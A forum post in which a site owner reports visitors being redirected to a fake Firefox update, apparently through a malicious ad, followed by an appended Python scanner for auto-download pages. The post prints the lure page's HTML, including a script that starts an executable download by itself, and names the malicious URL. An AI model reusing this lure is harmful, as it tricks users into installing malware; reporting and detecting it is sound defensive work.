Post by branjita on Jun 25, 2016 10:33:00 GMT -8
Forum URL: www.dragonballfigures.com
(dragonballfigures.boards.net)
I was viewing a topic, and I was immediately redirected to an obviously fake Firefox update. Something is wrong. Please analyze my forum and see if there's something doing this! Is there a vulnerability in a plug-in? Or what?
It redirected me to eeliacoollib.org/3491813243346/93c90f1f6cbfd233e1b06d101e410297.html which attempts to immediately download "firefox-patch.exe"
I firmly believe this has everything to do with a banner ad on the page, and not with my computer. I've had another user report something similar here: dragonballfigures.com/thread/3123/forum-issue-directed-malware
I was attempting to view this page, and it obviously does not do this redirect every time, so I think it surely must be banner ad related, and this entirely smells malicious! dragonballfigures.com/thread/3133/best-dbz?page=1&scrollTo=98685
Code of the website:
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title></title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="/PR1-2/css/normalize.css">
<link rel="stylesheet" href="/PR1-2/css/main.css">
<link href='https://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'>
<script src="/PR1-2/js/vendor/modernizr-2.6.2.min.js"></script>
</head>
<body>
<div class="container">
<h1>Urgent Firefox update</h1>
<a class="btn" href="/3491813243346/1466879334316883/firefox-patch.exe">Download Now</a>
</div>
<script>window.jQuery || document.write('<script src="/PR1-2/js/vendor/jquery-1.10.2.min.js"><\/script>')</script>
<script src="/PR1-2/js/plugins.js"></script>
<script src="/PR1-2/js/main.js"></script>
<script>
setTimeout("location.href = '3491813243346/1466879334316883/firefox-patch.exe';", 1000);
</script>
</body>
</html>
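Added example, not part of the original post: a static check over saved page source that separates executables a page merely links to from ones it navigates to by itself (inline `location` assignment or meta refresh), which is the behaviour visible in the captured page above. The class and function names, the extension list, and the sample host and path segments are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

EXECUTABLE_EXT = (".exe", ".msi", ".scr", ".bat", ".cmd", ".vbs", ".ps1")
# Matches location.href = '...', location = "...", location.assign('...'), location.replace('...')
NAV_RE = re.compile(r"""location(?:\.href)?\s*(?:=|\.(?:assign|replace)\s*\()\s*\\?['"]([^'"\\]+)""")
META_RE = re.compile(r"url\s*=\s*['\"]?([^'\";]+)", re.I)

class DownloadScanner(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.script, self.findings = page_url, None, []

    def _check(self, kind, ref):
        url = urljoin(self.page_url, ref.strip())   # resolve the way a browser would
        if urlparse(url).path.lower().endswith(EXECUTABLE_EXT):
            self.findings.append((kind, url))

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self.script = []                        # start buffering inline script text
        elif tag == "a" and attrs.get("href"):
            self._check("link", attrs["href"])      # needs a click
        elif tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            for ref in META_RE.findall(attrs.get("content") or ""):
                self._check("auto", ref)            # fires without a click

    def handle_data(self, data):
        if self.script is not None:
            self.script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self.script is not None:
            for ref in NAV_RE.findall("".join(self.script)):
                self._check("auto", ref)            # script-driven navigation
            self.script = None

def scan(html, page_url):
    scanner = DownloadScanner(page_url)
    scanner.feed(html)
    scanner.close()
    return scanner.findings                         # list of (kind, absolute_url)

# Constructed sample modelled on the captured page; host and path segments are placeholders.
PAGE_URL = "http://landing.example/1111/page.html"
SAMPLE = """<body><a class="btn" href="/1111/2222/firefox-patch.exe">Download Now</a>
<script>setTimeout("location.href = '1111/2222/firefox-patch.exe';", 1000);</script></body>"""
```

Any `auto` finding is worth flagging, since a page that starts an executable download without a click has no benign reason to do so. In the sample the script path is relative, so it resolves against the page's directory and yields a different absolute URL than the button's root-relative link.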